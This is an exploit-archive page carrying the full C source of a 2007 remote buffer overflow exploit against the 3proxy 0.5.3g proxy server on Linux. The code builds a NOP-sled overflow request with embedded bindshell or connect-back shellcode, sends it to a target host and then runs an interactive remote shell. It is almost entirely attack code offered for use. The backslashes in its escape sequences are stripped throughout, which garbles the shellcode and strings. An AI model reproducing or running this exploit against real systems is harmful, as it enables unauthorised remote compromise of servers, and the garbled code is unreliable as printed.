[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : 3proxy 0.5.3g proxy.c logurl() Remote Buffer Overflow Exploit (linux)
# Published : 2007-04-30
# Author : vade79
# Previous Title : 3proxy 0.5.3g proxy.c logurl() Remote Overflow Exploit (exec-shield)
# Next Title : 3proxy 0.5.3g proxy.c logurl() Remote Buffer Overflow Exploit (win32)
/*[ 3proxy[v0.5.3g]: (linux) remote buffer overflow exploit. ]***
* *
* by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo) *
* *
* compile: *
* gcc x3proxy.c -o x3proxy *
* *
* syntax: *
* ./x3proxy [-pscr+] -h host *
* *
* sumus homepage/url: *
* http://3proxy.ru/ *
* *
* 3Proxy tiny free proxy server previously known as 3[APA3A] *
* tiny freeware proxy. *
* *
* I just saw a (gentoo) advisory, and got curious how easy *
* it would be to exploit this. The vulnerability is fairly *
* trival: *
* *
* ----------------------------------------------------------- *
* GET /[NOPS][SHELLCODE][RETADDR]n *
* Host: [FILLER]nn *
* ----------------------------------------------------------- *
* *
* The length of "Host: [FILLER]" is exactly how many bytes *
* past the buffer boundary it will go, if it's not there it *
* won't overflow. The vulnerability can be found in proxy.c *
* in the logurl() function. (buf[LINESIZE]) *
* *
* I didn't work out a common place to find the shellcode in *
* memory. but, the following values(-r option) worked for *
* me: *
* 0x0805333c (gentoo/r2 0.5.3g src compile) *
* 0x08054da8 (mandrake 0.5.3g src compile) *
* *
* It will probably be easiest to run through a debugger and *
* find where the address of the shellcode is. (offsets of *
* around 1500 when brute guessing) *
***************************************************************/
#include <stdio.h>
#include <stdlib.h>
#ifndef __USE_BSD
#define __USE_BSD
#endif
#include <string.h>
#include <strings.h>
#include <signal.h>
#include <unistd.h>
#include <netdb.h>
#include <getopt.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define BUFSIZE 2200
#define TIMEOUT 10
#define DFL_PORT 3128
#define DFL_SPORT 7979
#define DFL_RETADDR 0x08048004
/* globals. */
static char x86_bind[]= /* bindshell, from netric. */
"x31xc0x50x40x89xc3x50x40x50x89xe1xb0x66"
"xcdx80x31xd2x52x66x68xffxffx43x66x53x89"
"xe1x6ax10x51x50x89xe1xb0x66xcdx80x40x89"
"x44x24x04x43x43xb0x66xcdx80x83xc4x0cx52"
"x52x43xb0x66xcdx80x93x89xd1xb0x3fxcdx80"
"x41x80xf9x03x75xf6x52x68x6ex2fx73x68x68"
"x2fx2fx62x69x89xe3x52x53x89xe1xb0x0bxcd"
"x80";
static char x86_conn[]= /* connect-back, eSDee/netric. */
"x31xc0x31xdbx31xc9x51xb1x06x51xb1x01x51"
"xb1x02x51x89xe1xb3x01xb0x66xcdx80x89xc2"
"x31xc0x31xc9x51x51x68xffxffxffxffx66x68"
"xffxffxb1x02x66x51x89xe7xb3x10x53x57x52"
"x89xe1xb3x03xb0x66xcdx80x31xc9x39xc1x74"
"x06x31xc0xb0x01xcdx80x31xc0xb0x3fx89xd3"
"xcdx80x31xc0xb0x3fx89xd3xb1x01xcdx80x31"
"xc0xb0x3fx89xd3xb1x02xcdx80x31xc0x31xd2"
"x50x68x6ex2fx73x68x68x2fx2fx62x69x89xe3"
"x50x53x89xe1xb0x0bxcdx80x31xc0xb0x01xcd"
"x80";
char *x86_ptr;
struct{
unsigned int addr;
signed int off;
char *host;
unsigned short port;
unsigned short sport;
}tbl;
/* lonely extern. */
extern char *optarg;
/* functions. */
char *getbuf(unsigned int);
unsigned short proxy_connect(char *,unsigned short);
signed int getshell_bind_init(unsigned short);
signed int getshell_bind_accept(signed int);
signed int getshell_conn(char *,unsigned short);
void proc_shell(signed int);
void printe(char *,short);
void usage(char *);
void sig_alarm(){printe("alarm/timeout hit.",1);}
/* start. */
int main(int argc,char **argv){
signed int chr=0,rsock=0;
unsigned int bs=0;
struct hostent *t;
in_addr_t s=0;
printf("[*] 3proxy[v0.5.3g]: (linux) remote buffer overflow explo"
"it.n[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)nn");
tbl.port=DFL_PORT;
tbl.sport=DFL_SPORT;
tbl.addr=DFL_RETADDR;
while((chr=getopt(argc,argv,"h:p:s:c:r:+:"))!=EOF){
switch(chr){
case 'h':
if(!tbl.host&&!(tbl.host=(char *)strdup(optarg)))
printe("main(): allocating memory failed",1);
break;
case 'p':
tbl.port=atoi(optarg);
break;
case 's':
tbl.sport=atoi(optarg);
break;
case 'c':
if((s=inet_addr(optarg))){
if((t=gethostbyname(optarg)))
memcpy((char *)&s,(char *)t->h_addr,sizeof(s));
if(s==-1)s=0;
if(!s)printe("invalid host/ip. (-c option)",0);
}
break;
case 'r':
sscanf(optarg,"%x",&tbl.addr);
break;
case '+':
tbl.off=atoi(optarg);
break;
default:
usage(argv[0]);
break;
}
}
if(!tbl.host)usage(argv[0]);
/* set bind port for shellcode. */
if(!s){
bs=strlen(x86_bind);
x86_bind[20]=(tbl.sport&0xff00)>>8;
x86_bind[21]=(tbl.sport&0x00ff);
x86_ptr=x86_bind;
}
/* set connect-back ip/port for shellcode. */
else{
bs=strlen(x86_conn);
x86_conn[33]=(s&0x000000ff);
x86_conn[34]=(s&0x0000ff00)>>8;
x86_conn[35]=(s&0x00ff0000)>>16;
x86_conn[36]=(s&0xff000000)>>24;
x86_conn[39]=(tbl.sport&0xff00)>>8;
x86_conn[40]=(tbl.sport&0x00ff);
x86_ptr=x86_conn;
}
if(bs!=strlen(x86_ptr))
printe("ip(-c option) and/or port(-s option) appear to contain a "
"null-byte, try again.",1);
printf("[*] targetttt: %s:%dn",tbl.host,tbl.port);
printf("[*] shellcode typett: %s(port=%d)n",
(s?"connect-back":"bindshell"),tbl.sport);
printf("[*] return address($eip)t: 0x%.8x(+%d=0x%.8x)n",tbl.addr,
tbl.off,tbl.addr+tbl.off);
if(s){
rsock=getshell_bind_init(tbl.sport);
proxy_connect(tbl.host,tbl.port);
rsock=getshell_bind_accept(rsock);
}
else{
proxy_connect(tbl.host,tbl.port);
rsock=getshell_conn(tbl.host,tbl.sport);
}
if(rsock>0)proc_shell(rsock);
exit(0);
}
/* make buf: "GET /[NOPS][SHELLCODE][RETADDR]nHost: [FILLER]nn" */
char *getbuf(unsigned int addr){
unsigned int i=0;
char *buf;
if(!(buf=(char *)malloc(BUFSIZE+1)))
printe("getbuf(): allocating memory failed.",1);
strcpy(buf,"GET /");
memset(buf+5,'x90',1800);
strcat(buf,x86_ptr);
for(i=strlen(buf);i<2100;i+=4){
*(long *)&buf[i]=addr;
}
strcat(buf,"nHost: ");
memset(buf+strlen(buf),'x',(BUFSIZE-strlen(buf)-3-2));
strcat(buf,"nn");
return(buf);
}
/* connects to the vulnerable 3proxy server. */
unsigned short proxy_connect(char *hostname,unsigned short port){
signed int sock;
struct hostent *t;
struct sockaddr_in s;
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
s.sin_family=AF_INET;
s.sin_port=htons(port);
printf("[*] attempting to connect: %s:%d.n",hostname,port);
if((s.sin_addr.s_addr=inet_addr(hostname))){
if(!(t=gethostbyname(hostname)))
printe("couldn't resolve hostname.",1);
memcpy((char *)&s.sin_addr,(char *)t->h_addr,sizeof(s.sin_addr));
}
signal(SIGALRM,sig_alarm);
alarm(TIMEOUT);
if(connect(sock,(struct sockaddr *)&s,sizeof(s)))
printe("3proxy connection failed.",1);
alarm(0);
printf("[*] successfully connected: %s:%d.n",hostname,port);
sleep(1);
printf("[*] sending string: "GET /[NOPS][SHELLCODE][RETADDR]"
"\nHost: [FILLER]\n\n"n");
write(sock,getbuf(tbl.addr+tbl.off),BUFSIZE);
sleep(1);
printf("[*] closing connection.nn");
close(sock);
return(0);
}
/* binds locally for connect-back. */
signed int getshell_bind_init(unsigned short port){
signed int ssock=0,so=1;
struct sockaddr_in ssa;
ssock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
setsockopt(ssock,SOL_SOCKET,SO_REUSEADDR,(void *)&so,sizeof(so));
#ifdef SO_REUSEPORT
setsockopt(ssock,SOL_SOCKET,SO_REUSEPORT,(void *)&so,sizeof(so));
#endif
ssa.sin_family=AF_INET;
ssa.sin_port=htons(port);
ssa.sin_addr.s_addr=INADDR_ANY;
if(bind(ssock,(struct sockaddr *)&ssa,sizeof(ssa))==-1)
printe("could not bind socket.",1);
listen(ssock,1);
return(ssock);
}
/* accepts locally for connect-back. */
signed int getshell_bind_accept(signed int ssock){
signed int sock=0;
unsigned int salen=0;
struct sockaddr_in sa;
memset((char*)&sa,0,sizeof(struct sockaddr_in));
salen=sizeof(sa);
printf("[*] awaiting connection from: *:%d.n",tbl.sport);
alarm(TIMEOUT);
sock=accept(ssock,(struct sockaddr *)&sa,&salen);
alarm(0);
close(ssock);
printf("[*] connection established. (connect-back)n");
return(sock);
}
/* connects to bindshell. */
signed int getshell_conn(char *hostname,unsigned short port){
signed int sock=0;
struct hostent *he;
struct sockaddr_in sa;
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
printe("getshell_conn(): socket() failed.",1);
sa.sin_family=AF_INET;
if((sa.sin_addr.s_addr=inet_addr(hostname))){
if(!(he=gethostbyname(hostname)))
printe("getshell_conn(): couldn't resolve.",1);
memcpy((char *)&sa.sin_addr,(char *)he->h_addr,
sizeof(sa.sin_addr));
}
sa.sin_port=htons(port);
signal(SIGALRM,sig_alarm);
printf("[*] attempting to connect: %s:%d.n",hostname,port);
alarm(TIMEOUT);
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){
printf("[!] connection failed: %s:%d.n",hostname,port);
exit(1);
}
alarm(0);
printf("[*] successfully connected: %s:%d.nn",hostname,port);
return(sock);
}
/* process the bind/connect-back shell. */
void proc_shell(signed int sock){
signed int r=0;
char buf[4096+1];
fd_set fds;
signal(SIGINT,SIG_IGN);
write(sock,"uname -a;idn",13);
while(1){
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sock,&fds);
if(select(sock+1,&fds,0,0,0)<1)
printe("getshell(): select() failed.",1);
if(FD_ISSET(0,&fds)){
if((r=read(0,buf,4096))<1)
printe("getshell(): read() failed.",1);
if(write(sock,buf,r)!=r)
printe("getshell(): write() failed.",1);
}
if(FD_ISSET(sock,&fds)){
if((r=read(sock,buf,4096))<1)exit(0);
write(1,buf,r);
}
}
close(sock);
return;
}
/* error! */
void printe(char *err,short e){
printf("[!] %sn",err);
if(e)exit(1);
return;
}
/* usage. */
void usage(char *progname){
printf("syntax: %s [-pscr+] -h hostnn",progname);
printf(" -h <host/ip>ttarget hostname/ip.n");
printf(" -p <port>ttarget port.n");
printf(" -s <port>tconnect-back/bind port. (shellcode)n");
printf(" -c <host/ip>tconnect-back host/ip. (enables "
"connect-back)n");
printf(" -r <addr>tdefine return address. (0x%.8x)n",tbl.addr);
printf(" -+ <offset>tadds to the -r option address.nn");
exit(0);
}
// www.Syue.com [2007-04-30]